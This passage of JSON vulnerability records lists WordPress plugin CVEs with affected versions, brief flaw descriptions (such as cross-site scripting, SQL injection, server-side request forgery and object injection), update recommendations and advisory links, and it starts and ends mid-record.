version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/494d2e69-0759-419a-a603-e8870c157e49?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/494d2e69-0759-419a-a603-e8870c157e49?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/classified-listing\\\/tags\\\/3.1.6\\\/app\\\/Controllers\\\/Ajax\\\/FormBuilderAdminAjax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/classified-listing\\\/tags\\\/3.1.6\\\/app\\\/Controllers\\\/Ajax\\\/FormBuilderAdminAjax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3150743\\\/classified-listing\\\/trunk\\\/app\\\/Controllers\\\/Ajax\\\/FormBuilderAdminAjax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3150743\\\/classified-listing\\\/trunk\\\/app\\\/Controllers\\\/Ajax\\\/FormBuilderAdminAjax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4787","slug":"cost-calculator-builder-pro","versionImpact":"3.1.75","versionEndExcluding":"3.1.76","description":"The Cost Calculator Builder PRO for WordPress is vulnerable to arbitrary email sending vulnerability in versions up to, and including, 3.1.75. This is due to insufficient limitations on the email recipient and the content in the 'send_pdf' and the 'send_pdf_front' functions which are reachable via AJAX. This makes it possible for unauthenticated attackers to send emails with any content to any recipient.","recommendation":"Update to version 3.1.76, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/035ada56-541d-47b3-8348-3401d94bb509?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/035ada56-541d-47b3-8348-3401d94bb509?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/docs.stylemixthemes.com\\\/cost-calculator-builder\\\/changelog-1\\\/changelog-pro-version\",\"name\":\"https:\\\/\\\/docs.stylemixthemes.com\\\/cost-calculator-builder\\\/changelog-1\\\/changelog-pro-version\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4789","slug":"cost-calculator-builder-pro","versionImpact":"3.1.72","versionEndExcluding":"3.1.73","description":"Cost Calculator Builder Pro plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to 3.1.72, via the send_demo_webhook() function. This makes it possible for authenticated attackers, with subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 3.1.73, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6840350-7ff4-4ec2-bf2b-94ce6f782537?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6840350-7ff4-4ec2-bf2b-94ce6f782537?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/stylemixthemes.com\\\/cost-calculator-plugin\\\/\",\"name\":\"https:\\\/\\\/stylemixthemes.com\\\/cost-calculator-plugin\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2113","slug":"autoptimize","versionEndExcluding":"3.1.7","description":"The Autoptimize WordPress plugin before 3.1.7 does not sanitise and escape the settings imported from a previous export, allowing high privileged users (such as an administrator) to inject arbitrary javascript into the admin panel, even when the unfiltered_html capability is disabled, such as in a multisite setup.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ddb4c95d-bbee-4095-aed6-25f6b8e63011\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ddb4c95d-bbee-4095-aed6-25f6b8e63011\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2805","slug":"supportcandy","versionEndExcluding":"3.1.7","description":"The SupportCandy WordPress plugin before 3.1.7 does not properly sanitise and escape the agents[] parameter in the set_add_agent_leaves AJAX function before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bdb75c8c-87e2-4358-ad3b-f4236e9a43c0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bdb75c8c-87e2-4358-ad3b-f4236e9a43c0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2719","slug":"supportcandy","versionEndExcluding":"3.1.7","description":"The SupportCandy WordPress plugin before 3.1.7 does not properly sanitise and escape the `id` parameter for an Agent in the REST API before using it in an SQL statement, leading to an SQL Injection exploitable by users with a role as low as Subscriber.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d9f6f4e7-a237-49c0-aba0-2934ab019e35\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d9f6f4e7-a237-49c0-aba0-2934ab019e35\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3241","slug":"ultimate-blocks","versionImpact":"3.1.6","versionEndExcluding":"3.1.7","description":"The Ultimate Blocks  WordPress plugin before 3.1.7 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 3.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a645daee-42ea-43f8-9480-ef3be69606e0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a645daee-42ea-43f8-9480-ef3be69606e0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1049","slug":"coblocks","versionImpact":"3.1.6","versionEndExcluding":"3.1.7","description":"The Page Builder Gutenberg Blocks \u2013 CoBlocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Icon Widget's in all versions up to, and including, 3.1.6 due to insufficient input sanitization and output escaping on the link value. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56d1d152-946f-47c9-b0d5-76513370677f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56d1d152-946f-47c9-b0d5-76513370677f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3049222%40vimeography&new=3049222%40vimeography&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3049222%40vimeography&new=3049222%40vimeography&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4097","slug":"cost-calculator-builder-pro","versionImpact":"3.1.67","versionEndExcluding":"3.1.68","description":"The Cost Calculator Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the SVG upload feature in all versions up to, and including, 3.1.67 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.68, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/526add70-4fcf-44d1-b4d8-4cc35652b1f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/526add70-4fcf-44d1-b4d8-4cc35652b1f0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/docs.stylemixthemes.com\\\/cost-calculator-builder\\\/changelog-1\\\/changelog-pro-version\",\"name\":\"https:\\\/\\\/docs.stylemixthemes.com\\\/cost-calculator-builder\\\/changelog-1\\\/changelog-pro-version\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2472","slug":"mailin","versionEndExcluding":"3.1.61","description":"The Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue WordPress plugin before 3.1.61 does not sanitise and escape a parameter before outputting it back in the admin dashboard when the WPML plugin is also active and configured, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b0e7665a-c8c3-4132-b8d7-8677a90118df\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b0e7665a-c8c3-4132-b8d7-8677a90118df\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4060","slug":"adminify","versionEndExcluding":"3.1.6","description":"The WP Adminify WordPress plugin before 3.1.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/88745c9b-1c20-4004-89f6-d9ee223651f2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/88745c9b-1c20-4004-89f6-d9ee223651f2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10667","slug":"content-slider-block","versionImpact":"3.1.5","versionEndExcluding":"3.1.6","description":"The Content Slider Block plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 3.1.5 via the [csb] shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to.","recommendation":"Update to version 3.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c34ca97f-d974-4ad1-b4a5-93613eb43a37?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c34ca97f-d974-4ad1-b4a5-93613eb43a37?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3180314\\\/content-slider-block\\\/tags\\\/3.1.6\\\/includes\\\/CustomPost.php?old=3178657&old_path=content-slider-block%2Ftags%2F3.1.5%2Fincludes%2FCustomPost.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3180314\\\/content-slider-block\\\/tags\\\/3.1.6\\\/includes\\\/CustomPost.php?old=3178657&old_path=content-slider-block%2Ftags%2F3.1.5%2Fincludes%2FCustomPost.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13357","slug":"ditty-news-ticker","versionImpact":"3.1.51","versionEndExcluding":"3.1.52","description":"The Ditty  WordPress plugin before 3.1.52 does not sanitise and escape some of its settings, which could allow high privilege users such as author to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.1.52, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d134bb34-6324-4bc8-943e-4e743d00fcb2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d134bb34-6324-4bc8-943e-4e743d00fcb2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2800","slug":"wp-event-manager","versionImpact":"3.1.50","versionEndExcluding":"3.1.51","description":"The WP Event Manager \u2013 Events Calendar, Registrations, Sell Tickets with WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018organizer_name' parameter in all versions up to, and including, 3.1.50 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.51, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318605\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318605\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87178c7c-343b-487a-9adb-7ff13aae81df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87178c7c-343b-487a-9adb-7ff13aae81df?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2025-2799","slug":"wp-event-manager","versionImpact":"3.1.49","versionEndExcluding":"3.1.50","description":"The WP Event Manager \u2013 Events Calendar, Registrations, Sell Tickets with WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018tag-name\u2019 parameter in all versions up to, and including, 3.1.49 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 3.1.50, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3309197\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3309197\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5cb5ab0-2110-49be-bc09-6847065a9dd9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5cb5ab0-2110-49be-bc09-6847065a9dd9?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2023-1730","slug":"supportcandy","versionEndExcluding":"3.1.5","description":"The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/44b51a56-ff05-4d50-9327-fc9bab74d4b7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/44b51a56-ff05-4d50-9327-fc9bab74d4b7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13834","slug":"responsive-add-ons","versionImpact":"3.1.4","versionEndExcluding":"3.1.5","description":"The Responsive Plus \u2013 Starter Templates, Advanced Features and Customizer Settings for Responsive Theme plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 3.1.4 via the 'remote_request' function. This makes it possible for authenticated attackers, with contributor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 3.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3240422\\\/responsive-add-ons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3240422\\\/responsive-add-ons\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2833265-f1e5-4cfd-ad2f-ca28a59de82f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2833265-f1e5-4cfd-ad2f-ca28a59de82f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9600","slug":"ditty-news-ticker","versionImpact":"3.1.46","versionEndExcluding":"3.1.47","description":"The Ditty  WordPress plugin before 3.1.47 does not sanitise and escape some of its settings, which could allow high privilege users such as author to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 3.1.47, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d1c78389-29eb-4dce-848c-e0eab85ff5cd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d1c78389-29eb-4dce-848c-e0eab85ff5cd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6715","slug":"ditty-news-ticker","versionImpact":"3.1.45","versionEndExcluding":"3.1.46","description":"The Ditty  WordPress plugin before 3.1.46 re-introduced a previously fixed security issue (https:\/\/wpscan.com\/vulnerability\/80a9eb3a-2cb1-4844-9004-ba2554b2d46c\/) in v3.1.39","recommendation":"Update to version 3.1.46, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19406acc-3441-4d4a-9163-ace8f1dceb78\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19406acc-3441-4d4a-9163-ace8f1dceb78\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6710","slug":"ditty-news-ticker","versionImpact":"3.1.44","versionEndExcluding":"3.1.45","description":"The Ditty  WordPress plugin before 3.1.45 does not sanitise and escape some parameters, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks.","recommendation":"Update to version 3.1.45, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1afcf9d4-c2f9-4d47-8d9e-d7fa6ae2358d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1afcf9d4-c2f9-4d47-8d9e-d7fa6ae2358d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2691","slug":"wp-event-manager","versionImpact":"3.1.43","versionEndExcluding":"3.1.44","description":"The WP Event Manager \u2013 Events Calendar, Registrations, Sell Tickets with WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'events' shortcode in all versions up to, and including, 3.1.43 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01a6dcf2-6f0b-494b-a18c-04bd9c44e0ce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01a6dcf2-6f0b-494b-a18c-04bd9c44e0ce?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3116941\\\/wp-event-manager\\\/trunk\\\/shortcodes\\\/wp-event-manager-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3116941\\\/wp-event-manager\\\/trunk\\\/shortcodes\\\/wp-event-manager-shortcodes.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5575","slug":"ditty-news-ticker","versionImpact":"3.1.42","versionEndExcluding":"3.1.43","description":"The Ditty  WordPress plugin before 3.1.43 does not sanitise and escape some of its blocks' settings, which could allow high privilege users such as authors to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 3.1.43, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/65d1abb7-92e9-4cc4-a1d0-84985b484af3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/65d1abb7-92e9-4cc4-a1d0-84985b484af3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6165","slug":"restrict-usernames-emails-characters","versionEndExcluding":"3.1.4","description":"The Restrict Usernames Emails Characters WordPress plugin before 3.1.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 3.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aba62286-9a82-4d5b-9b47-1fddde5da487\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aba62286-9a82-4d5b-9b47-1fddde5da487\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/youki992\\\/youki992.github.io\\\/blob\\\/master\\\/others\\\/apply2.md\",\"name\":\"https:\\\/\\\/github.com\\\/youki992\\\/youki992.github.io\\\/blob\\\/master\\\/others\\\/apply2.md\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0668","slug":"advanced-database-cleaner","versionImpact":"3.1.3","versionEndExcluding":"3.1.4","description":"The Advanced Database Cleaner plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.1.3 via deserialization of untrusted input in the 'process_bulk_action' function. This makes it possible for authenticated attacker, with administrator access and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 3.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0b8c24b-3e51-4637-9d8e-da065077d082?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0b8c24b-3e51-4637-9d8e-da065077d082?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-database-cleaner\\\/tags\\\/3.1.3\\\/includes\\\/class_clean_cron.php#L224\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-database-cleaner\\\/tags\\\/3.1.3\\\/includes\\\/class_clean_cron.php#L224\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-database-cleaner\\\/tags\\\/3.1.3\\\/includes\\\/class_clean_cron.php#L298\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-database-cleaner\\\/tags\\\/3.1.3\\\/includes\\\/class_clean_cron.php#L298\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3025980\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3025980\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5109","slug":"wp-mailto-links","versionImpact":"3.1.3","versionEndExcluding":"3.1.4","description":"The WP Mailto Links \u2013 Protect Email Addresses plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'wpml_mailto' shortcode in versions up to, and including, 3.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This was partially patched in version 3.1.3 and fully patched in version 3.1.4.","recommendation":"Update to version 3.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec882062-0059-47ca-a007-3347e7adb70b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec882062-0059-47ca-a007-3347e7adb70b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-mailto-links\\\/tags\\\/3.1.2\\\/core\\\/includes\\\/classes\\\/class-wp-mailto-links-validate.php#L582\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-mailto-links\\\/tags\\\/3.1.2\\\/core\\\/includes\\\/classes\\\/class-wp-mailto-links-validate.php#L582\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3901","slug":"genesis-blocks","versionImpact":"3.1.3","versionEndExcluding":"3.1.4","description":"The Genesis Blocks WordPress plugin through 3.1.3 does not properly escape attributes provided to some of its custom blocks, making it possible for users allowed to write posts (like those with the contributor role) to conduct Stored XSS attacks.","recommendation":"Update to version 3.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9502e1ac-346e-4431-90a6-61143d2df37b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9502e1ac-346e-4431-90a6-61143d2df37b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8867","slug":"graphina-elementor-charts-and-graphs","versionImpact":"3.1.3","versionEndExcluding":"3.1.4","description":"The Graphina - Elementor Charts and Graphs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple chart widget parameters in version 3.1.3 and below. This is due to insufficient input sanitization and output escaping on user supplied attributes such as chart categories, titles, and tooltip settings. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/AreaChart.php#L156\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/AreaChart.php#L156\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/ColumnChart.php#L183\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/ColumnChart.php#L183\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/DistributeColumnChart.php#L179\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/DistributeColumnChart.php#L179\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/HeatmapChart.php#L173\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/HeatmapChart.php#L173\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/LineChart.php#L186\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/LineChart.php#L186\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/RadarChart.php#L182\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/RadarChart.php#L182\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/ScatterChart.php#L181\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/ScatterChart.php#L181\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/TimelineChart.php#L173\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/TimelineChart.php#L173\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"